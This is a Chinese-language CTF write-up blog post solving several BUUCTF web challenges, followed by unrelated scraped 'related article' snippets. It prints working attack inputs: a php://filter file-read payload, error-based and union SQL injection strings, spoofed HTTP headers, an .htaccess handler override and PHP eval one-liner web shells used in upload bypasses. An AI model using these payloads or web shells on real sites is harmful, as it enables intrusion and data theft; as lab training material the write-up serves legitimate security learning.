BUUCTF-WEB(9-14)

news/2024/11/17 10:38:15/文章来源:https://www.cnblogs.com/Muneyoshi/p/18200342

[极客大挑战 2019]Secret File

打开题目查看源码,找到了一个文件

image-20240519090435723

然后就是一个按钮,点击后,他应该是反应了,但是我们看不到

image-20240519090558776

那我们抓包看看,这里是Burp抓包后,发到重发器发送了一遍,看看响应包,发现了

image-20240519090720685

然后访问这个网页就是一个源码

image-20240519090803254

这里没有过滤php://filter

?file=php://filter/read=convert.base64-encode/resource=flag.php

base64解密后得到flag

image-20240519091200421

[极客大挑战 2019]LoveSQL

先用万能账号密码试试,成功登录

1'or true#

image-20240519091425033

登陆进去没啥用,可能藏在数据库了,这次我们用报错注入,因为我试了,他会有报错语句

爆库名

1' and extractvalue(1,concat(0x7e,(select database()),0x7e))or '

image-20240519091951111

爆表名

1' and extractvalue(1,concat(0x7e,(select group_concat(table_name)from information_schema.tables where table_schema='geek'),0x7e))or '

image-20240519092125241

先爆这个love这个表里面的列,毕竟他和题目一样名字

1' and extractvalue(1,concat(0x7e,(select group_concat(column_name)from information_schema.columns where table_schema='geek' and table_name='l0ve1ysq1'),0x7e))or '

image-20240519092442331

然后爆数据(我觉得我挺傻逼,我爆到第15行才有flag,纯手搓)

1' and extractvalue(1,concat(0x7e,(select password from l0ve1ysq1 limit 15,1),0x7e))or '

image-20240519094449846

然后我发现死活得不到后半段,只要一看16行就报错,我也是不懂了,所以最后我就正常得到数据的

1' union select 1,2,group_concat(password) from l0ve1ysq1#

image-20240519095116113

[极客大挑战 2019]Http

打开题目发现是卖鞋厂,我也是慌了,看看源代码有没有信息吧

image-20240519095426160

找到了,那我们就访问一下

image-20240519095504607

抓包开搞:

说我不是这里来的

image-20240519095539850

Referer:https://Sycsecret.buuoj.cn

又提示不是这个浏览器

image-20240519095939494

User-Agent: Syclover

又提示不是本地访问

image-20240519100038017

X-Forwarded-For:127.0.0.1

总的请求头就是这个:

image-20240519100241156

拿下flag:

image-20240519100251884

[极客大挑战 2019]Knife

image-20240519101402421

蚁剑直接连接

image-20240519101536198

根目录找到flag

image-20240519101555002

[极客大挑战 2019]Upload

这道题就是我发现可以上传.htaccess文件

所以这里我就抓包上传

<IfModule mime_module>
SetHandler application/x-httpd-php
</IfModule>

image-20240519105125439

然后开始上传图片马

这道题过滤了 <? 所以常规的一句话木马我们是不能上传的

<script language="php">@eval($_POST['cmd'])</script>

image-20240519105510470

上传成功后,没有返回路径,我们猜测在upload的文件夹下,访问一下果然有

image-20240519105549475

那我们就找到我们上传的一句话木马的文件,开始试着蚁剑连接

image-20240519105636982

发现不行,好像是.htaccess这个文件不起作用

那我们用后缀名绕过 phtml

GIF89a
<script language="php">eval($_REQUEST['cmd'])</script>

image-20240519110546996

然后用蚁剑连接

image-20240519110634481

根目录找到flag

image-20240519110657709

[ACTF2020 新生赛]Upload

这道题就是MIME绕过就行,还有一些后缀名被过滤了

后缀名我们就用phtml,这个是可以被解析的

image-20240519130441814

蚁剑连接,根目录找到flag

image-20240519130549807

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.hqwc.cn/news/708759.html

如若内容造成侵权/违法违规/事实不符,请联系编程知识网进行投诉反馈email:809451989@qq.com,一经查实,立即删除!

相关文章

iMessage群发,苹果iMessage短信,苹果iMessage推信,电脑版Mac Os系统自动群发iMessage完美实现 - 电脑端升级版

一、PC电脑版苹果系统(Mac OS)上实现imessage群发总结为以下几种方式: /*MacOS苹果系统,正常情况下,只能安装到苹果公司自己出品的Mac电脑,俗称白苹果,不能安装到各种组装机或者其他品牌的品牌机上,黑苹果的的原理,就是通过一些 “破解补丁” 工具欺骗macOS系统,让苹果系统…

pip虚拟环境安装包

pip虚拟环境安装包 问题描述 通常情况下,我们常使用Conda创建虚拟环境,然后再在虚拟环境内进行安装相应的软件包。虚拟环境可以让我们免收软件包的版本冲突的问题。但是有一些软件包不能通过Conda安装,只能通过pip安装。通常情况下,pip安装的软件包作用于全局,因而又会导致…

OWASP-Hackademic-Challenges

1.靶场安装 靶场下载:https://code.google.com/archive/p/owasp-hackademic-challenges/downloads 在phpstudy中搭建即可 访问页面:2.OWASP Hackademic Challenge – Challenge 1 2.1.解题点击链接,进入靶场页面上没有什么有用的消息,查看页面源代码(Ctrl+U)可以找到不同…

salesforce零基础学习(一百三十七)零碎知识点小总结(九)

本篇参考: https://help.salesforce.com/s/articleView?id=release-notes.rn_lab_conditional_visibiliy_tab.htm&release=250&type=5 https://help.salesforce.com/s/articleView?id=release-notes.rn_automate_flow_builder_automation_lightning_app.htm&re…

【转载】Verilog对数据进行四舍五入(round)与饱和(saturation)截位

Verilog对数据进行四舍五入(round)与饱和(saturation)截位 一、软件平台与硬件平台 软件平台:操作系统:Windows 8.1 64-bit开发套件:Vivado2015.4.2 Matlab2016a仿真工具:Vivado自带仿真器 二、引言在利用Verilog写数字信号处理相关算法的过程中往往涉及到对数据的量化…

UE4 C++ 攀爬功能

UE中的TEXT() UE中使用TEXT()包含字符串后,将字符串转换为宽字符,其将被处理为支持Unicode和跨平台兼容性,而普通类型的字符串为一个窄字符类型,可能在跨平台出现问题。 最主要的问题是在FString的构造函数中是接受TCHAR的所以对于FString FName FTEXT的构造需要传入TEXT(&…

消防二总线 PowerBus 通信原理简介

典型应用图 首先需要设计一种可编码寻址通用联动控制接口件。一方面它作为二总线上的挂接设备——能被区域控制器寻址,同时返回自身的状态信息; 另一方面当区域控制器需要联动它所控制的消防设备时能提供控制触点。如图①,通用联动接口通过桥式输入电路与总线相联,桥式输入…

实验4

task1_1.c点击查看代码 #include <stdio.h> #define N 4void test1() {int a[N] = {1, 9, 8, 4}; int i;printf("sizeof(a) = %d\n", sizeof(a));for (i = 0; i < N; ++i)printf("%p: %d\n", &a[i], a[i]);printf("a = %p\n&qu…

消防二总线通信原理简介

典型应用图 首先需要设计一种可编码寻址通用联动控制接口件。一方面它作为二总线上的挂接设备——能被区域控制器寻址,同时返回自身的状态信息; 另一方面当区域控制器需要联动它所控制的消防设备时能提供控制触点。如图①,通用联动接口通过桥式输入电路与总线相联,桥式输入…